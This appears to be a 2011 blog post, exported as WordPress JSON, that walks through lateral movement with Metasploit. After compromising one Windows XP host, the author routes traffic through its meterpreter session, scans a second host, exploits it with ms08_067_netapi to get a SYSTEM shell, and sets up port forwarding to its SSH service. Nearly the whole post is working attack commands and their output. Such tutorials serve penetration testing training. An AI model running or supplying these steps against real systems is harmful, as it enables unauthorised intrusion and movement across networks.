{"id":120,"date":"2011-06-20T11:12:46","date_gmt":"2011-06-20T10:12:46","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=120"},"modified":"2011-06-28T16:05:12","modified_gmt":"2011-06-28T15:05:12","slug":"pivoting-through-a-meterpreter-session","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2011\/06\/20\/pivoting-through-a-meterpreter-session\/","title":{"rendered":"Pivoting through a meterpreter session"},"content":{"rendered":"

So you’ve owned a box and now you want to exploit others using the first as a pivot.
\nFirst thing to do is background your current meterpreter session:<\/p>\n

1
2
3
4
5
6
7
<\/div><\/td>
meterpreter ><\/span> background
\nmsf exploit(<\/span>multi_handler)<\/span> ><\/span> sessions -l<\/span>
\nActive sessions
\n===============
\nId\u00a0 Type\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Information\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Connection
\n--\u00a0 ----\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -----------\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ----------<\/span>
\n1<\/span>\u00a0\u00a0 meterpreter x86\/<\/span>win32\u00a0 XPSP0\\Administrator @<\/span> XPSP0\u00a0\u00a0 81.142.243.100:21<\/span> -><\/span> 1.2.3.4:1050<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Then add the pivot: route add [ip of target] [subnet] [meterpreter session id]<\/p>\n

1
2
3
4
5
6
7
8
<\/div><\/td>
msf exploit(<\/span>ms08_067_netapi)<\/span> ><\/span> route add 1.2.3.4 255.255.255.0 1<\/span>
\nmsf exploit(<\/span>ms08_067_netapi)<\/span> ><\/span> route print
\nActive Routing Table
\n====================
\nSubnet\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Netmask\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Gateway
\n------\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -------\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 -------<\/span>
\n1.2.3.4 \u00a0\u00a0\u00a0\u00a0 255.255.255.0\u00a0\u00a0\u00a0\u00a0\u00a0 Session 1<\/span>
\nmsf exploit(<\/span>ms08_067_netapi)<\/span> ><\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Now to run a tcp scan through the pivot \ud83d\ude42<\/p>\n

1
2
3
4
5
6
7
<\/div><\/td>
msf exploit(<\/span>ms08_067_netapi)<\/span> ><\/span> use auxiliary\/<\/span>scanner\/<\/span>portscan\/<\/span>tcp
\nmsf auxiliary(<\/span>tcp)<\/span> ><\/span> set<\/span> RHOSTS 1.2.3.10
\nRHOSTS =><\/span> 1.2.3.10
\nmsf auxiliary(<\/span>tcp)<\/span> ><\/span> run
\n[<\/span>*<\/span>]<\/span> 1.2.3.10:139<\/span> - TCP OPEN
\n[<\/span>*<\/span>]<\/span> 1.2.3.10:135<\/span> - TCP OPEN
\n[<\/span>*<\/span>]<\/span> 1.2.3.10:445<\/span> - TCP OPEN<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Then simply exploit the second box using the same metasploit console:<\/p>\n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<\/div><\/td>
msf exploit(<\/span>ms08_067_netapi)<\/span> ><\/span> show options
\nModule options (<\/span>exploit\/<\/span>windows\/<\/span>smb\/<\/span>ms08_067_netapi)<\/span>:
\n   Name     Current Setting  Required  Description
\n   ----<\/span>     ---------------<\/span>  --------<\/span>  -----------<\/span>
\n   RHOST    1.2.3.10    yes<\/span>       The target address
\n   RPORT    445<\/span>              yes<\/span>       Set the SMB service port
\n   SMBPIPE  BROWSER          yes<\/span>       The pipe name to use (<\/span>BROWSER, SRVSVC)<\/span>
\nPayload options (<\/span>windows\/<\/span>meterpreter\/<\/span>bind_tcp)<\/span>:
\n   Name      Current Setting  Required  Description
\n   ----<\/span>      ---------------<\/span>  --------<\/span>  -----------<\/span>
\n   EXITFUNC  thread           yes<\/span>       Exit technique: seh, thread, process, none
\n   LPORT     4444<\/span>             yes<\/span>       The listen port
\n   RHOST     1.2.3.10    no        The target address
\nExploit target:
\n   Id  Name
\n   --<\/span>  ----<\/span>
\n   0<\/span>   Automatic Targeting
\n
\nmsf exploit(<\/span>ms08_067_netapi)<\/span> ><\/span> exploit
\n[<\/span>*<\/span>]<\/span> Started bind<\/span> handler
\n[<\/span>*<\/span>]<\/span> Automatically detecting the target...
\n[<\/span>*<\/span>]<\/span> Fingerprint: Windows XP - Service Pack 0<\/span> \/<\/span> 1<\/span> - lang:English
\n[<\/span>*<\/span>]<\/span> Selected Target: Windows XP SP0\/<\/span>SP1 Universal
\n[<\/span>*<\/span>]<\/span> Attempting to trigger the vulnerability...
\n[<\/span>*<\/span>]<\/span> Sending stage (<\/span>749056<\/span> bytes)<\/span>
\n[<\/span>*<\/span>]<\/span> Meterpreter session 2<\/span> opened (<\/span>81.142.243.100-1.2.3.4:0<\/span> -><\/span> 1.2.3.5:4444<\/span>)<\/span> at 2011<\/span>-06-20<\/span> 10<\/span>:56<\/span>:13<\/span> +0100<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

And to show the second session running through the first we’ll list the sessions again:<\/p>\n

1
2
3
4
5
6
7
8
9
10
<\/div><\/td>
meterpreter ><\/span> background
\nmsf exploit(<\/span>ms08_067_netapi)<\/span> ><\/span> sessions -l<\/span>
\nActive sessions
\n===============
\n  Id  Type                   Information                   Connection
\n  --<\/span>  ----<\/span>                   -----------<\/span>                   ----------<\/span>
\n  1<\/span>   meterpreter x86\/<\/span>win32  XPSP0\\Administrator @<\/span> XPSP0   81.142.243.100:21<\/span> -><\/span> 1.2.3.4:1050<\/span>
\n  2<\/span>   meterpreter x86\/<\/span>win32  NT AUTHORITY\\SYSTEM @<\/span> XPSP0C  81.142.243.100-1.2.3.4:0<\/span> -><\/span> 1.2.3.10:4444<\/span>
\n
\nmsf exploit(<\/span>ms08_067_netapi)<\/span> ><\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Sweet!!! <\/p>\n

UPDATE:<\/strong>
\nI forgot to mention the ability to port forward from within a meterpreter session:
\nLets just say that the target2 [1.2.3.10] had ssh on it and you wanted to connect to that ssh session but couldn’t do so directly…. well, this is where the portfwd command comes in.<\/p>\n

1
2
3
<\/div><\/td>
msf > sessions -i 1
\nmeterpreter > portfwd add -l 44422 -p 22 -r 1.2.3.10
\n[*] Local TCP relay created: 0.0.0.0:44422 <-> 1.2.3.10:22<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

What the above does is map the local TCP port 44422 on the attackers box to TCP port 22 on 1.2.3.10. Now simply connect to the target2 from a console using:<\/p>\n

1
<\/div><\/td>
ssh 127.0.0.1:44422<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

The above applies for any service, simply just map it to an unused local port (to save confusion try to make the ports easy to understand, i append 4’s to the port).<\/p>\n

1
2
3
<\/div><\/td>
remote:80 --> local:44480
\nremote:22 --> local:44422
\nremote:8080--> local:48080<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"

So you’ve owned a box and now you want to exploit others using the first as a pivot. First thing to do is background your current meterpreter session: 1234567meterpreter > background msf exploit(multi_handler) > sessions -l Active sessions =============== Id\u00a0 Type\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Information\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Connection —\u00a0 —-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ———–\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ———- 1\u00a0\u00a0 meterpreter x86\/win32\u00a0 XPSP0\\Administrator @ XPSP0\u00a0\u00a0 81.142.243.100:21 -> […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[456,47,62,73,72,63,65],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/120"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=120"}],"version-history":[{"count":12,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/120\/revisions"}],"predecessor-version":[{"id":140,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/120\/revisions\/140"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=120"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}